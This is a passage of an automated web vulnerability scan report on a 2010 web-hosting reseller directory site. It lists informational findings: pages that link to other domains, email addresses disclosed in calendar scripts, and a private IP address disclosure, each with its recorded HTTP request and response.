Date: Wed, 17 Nov 2010 23:44:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.366. http://www.resellerbase.com/web-service/software-scripts/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.367. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.368. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.369. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.370. http://www.resellerbase.com/web-service/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.371. http://www.resellerbase.com/web-service/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.372. http://www.resellerbase.com/web-service/web-hosting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.373. http://www.resellerbase.com/web-service/web-hosting/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/googlepr.php?link_id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.374. http://www.resellerbase.com/web-service/web-hosting/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 50692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://reseller.targetdomain.com" name="link_4"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://reseller.targetdomain.com" name="link_4"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.375. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.376. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.377. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.378. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.379. http://www.resellerbase.com/web-service/web-hosting/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

7. Email addresses disclosed
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.resellerbase.com/themes/kosmos/calendar-en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/kosmos/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:35:22 GMT
ETag: "ab81487-e10-44737fe4bda80"
Accept-Ranges: bytes
Content-Length: 3600
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript

// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Encoding: any
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 i
...[SNIP]...

7.2. http://www.resellerbase.com/themes/kosmos/calendar.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/kosmos/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:35:45 GMT
ETag: "ab8144d-860e-44737ffaace40"
Accept-Ranges: bytes
Content-Length: 34318
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript

/* Copyright Mihai Bazon, 2002-2005 | www.bazon.net/mishoo
* -----------------------------------------------------------
*
* The DHTML Calendar, version 1.0 "It is happening again"
*
* Details
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...

8. Private IP addresses disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /googlepr.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /googlepr.php?link_id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:48 GMT
Server: Apache/2
